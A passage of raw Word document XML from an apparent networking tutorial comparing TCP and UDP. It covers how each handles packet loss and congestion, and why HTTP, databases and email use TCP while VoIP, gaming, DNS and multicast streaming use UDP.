              <w:t>Single packet lost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6D8B99" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Retransmit (adds 1 RTT+), HOL blocks stream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912E5F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Packet is gone. Application never knows (unless it tracks).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="4CBF920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2BCCC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Network congestion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5B6A9F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Backs off (reduces sending rate)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16336B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Continues sending (exacerbates congestion)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="5F32C30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51B749" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Receiver overwhelmed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F153D3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Sender pauses (window = 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297322" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Receiver drops packets silently</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="7C2E6C0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6FED88" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Network partition (brief)</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F85107" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connection survives (retransmits until timeout)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492C1E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Nothing to survive (no connection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="56A4363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F3A044" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Network partition (long)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580214" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Connection times out and dies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54AE02" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Nothing to die (no connection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A51E9" w:rsidRPr="008A51E9" w14:paraId="2EB65B0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C03A8F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Reordering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937FB5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Receiver buffers and reorders → delivers in order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96EAB0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
            <w:r w:rsidRPr="008A51E9">
              <w:t>Application receives out-of-order (must handle)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24CEBD0A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="0961E847">
          <v:rect id="_x0000_i5017" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36E387" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. TCP Use Cases — When Reliability Matters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C3830B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 HTTP/HTTPS (Web Traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586FE08" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Web pages are documents. Every byte matters. A missing CSS rule breaks layout. A missing JavaScript character breaks execution. An incomplete image is useless.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC6C3A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The modern evolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> HTTP/1.1 → HTTP/2 (still TCP) → HTTP/3 (QUIC over UDP — but with reliability rebuilt on top).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B608F16" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>HTTP/3's move to UDP isn't because web traffic doesn't need reliability — it needs reliability WITHOUT TCP's HOL blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725E2AA9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.2 Database Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21979659" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A SQL query result with one wrong byte is a data corruption catastrophe. A missing row in the result set is a logic error. Order matters (streaming result sets).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F9F09" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>All database protocols use TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> MySQL, PostgreSQL, MongoDB, Redis, Cassandra (client-to-node). The reliability is non-negotiable for data correctness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834F9C9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 File Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F3B81" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A file with missing bytes is a corrupted file. Order matters (you can't reconstruct a file from randomly-ordered chunks without additional metadata).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277AB981" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP, SFTP, SCP, rsync:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> All TCP-based.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B443C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Email (SMTP, IMAP, POP3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E57861" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Emails must arrive completely and correctly. A lost sentence in an email is unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7647FF1F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.5 RPC Frameworks (gRPC, Thrift)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431338F4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why TCP:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Remote procedure calls need reliable delivery of both request and response. A partial response is unusable. Ordering of streamed responses matters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537CC9AC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="0C18A651">
          <v:rect id="_x0000_i5018" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7551ADF0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. UDP Use Cases — When Speed/Freshness Matters More Than Completeness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598AC3F3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Real-Time Voice/Video (VoIP, Video Conferencing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8C338B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA2356A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeliness over completeness:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> A voice packet that arrives 500ms late is useless (the conversation has moved on). It's better to skip it than wait for retransmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E7D5C9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packet loss is tolerable:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Human ear/eye can tolerate 1–5% packet loss without noticing (codecs mask the gap with prediction/interpolation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A015549" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1383"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retransmission makes things WORSE:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> By the time a retransmitted packet arrives, it's too old to be useful — AND it consumed bandwidth that could carry newer data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5031C67B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How VoIP handles loss without TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20984B48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Voice is encoded in 20ms frames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8CC088" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Each frame is one UDP datagram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2DDCC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>If frame 50 is lost → codec interpolates from frames 49 and 51 (concealment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC3C463" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1384"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>User hears a tiny glitch (barely noticeable) vs. a 200ms delay (conversation-breaking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A51C562" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Online Gaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E1C04" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E559002" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Player position updates:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Every 16–33ms (60–30 Hz), server sends game state to all players.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73826C4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Old state is useless:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If position update #100 is lost, position update #101 (arriving 16ms later) supersedes it anyway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D819C10" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retransmitting #100 wastes time:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> By the time it arrives, updates #101–#105 have made it irrelevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D06C7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1385"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency is everything:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> 50ms of added latency (from TCP retransmit) = visible lag = terrible user experience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609C899" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Games use UDP + application-level selective reliability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00617A4A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Position updates: unreliable (latest always wins).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D2128" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Chat messages: reliable (application-level ACK + retransmit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450DBED1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1386"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Critical game events (score, item pickup): reliable (application-level sequencing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5E447F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A769D8C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386BC6F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Small messages:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Query and response typically fit in a single packet (&lt; 512 bytes historically, &lt; 4096 with EDNS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7A720" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency-critical:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> DNS is on the critical path of EVERY connection. Adding 1 RTT handshake to every DNS query would double resolution time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D31DF6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stateless:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> DNS servers handle millions of queries/second. Maintaining TCP state per query would be prohibitively expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B314E12" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1387"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Idempotent:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> If a query is lost, the client just sends another one. Simple retry is sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CE214" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When DNS uses TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C9F56D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Response exceeds UDP size limit → truncation flag set → client retries over TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED94079" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Zone transfers (AXFR/IXFR) — bulk data that needs reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8B2EAF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1388"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>DNS over TLS (DoT) — long-lived encrypted connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098AC96B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 Live Streaming / Broadcasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5DB92E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why UDP (at lower layers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295F31A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1389"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multicast:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> UDP supports IP multicast (one sender, many receivers). TCP is point-to-point only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BFAAB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
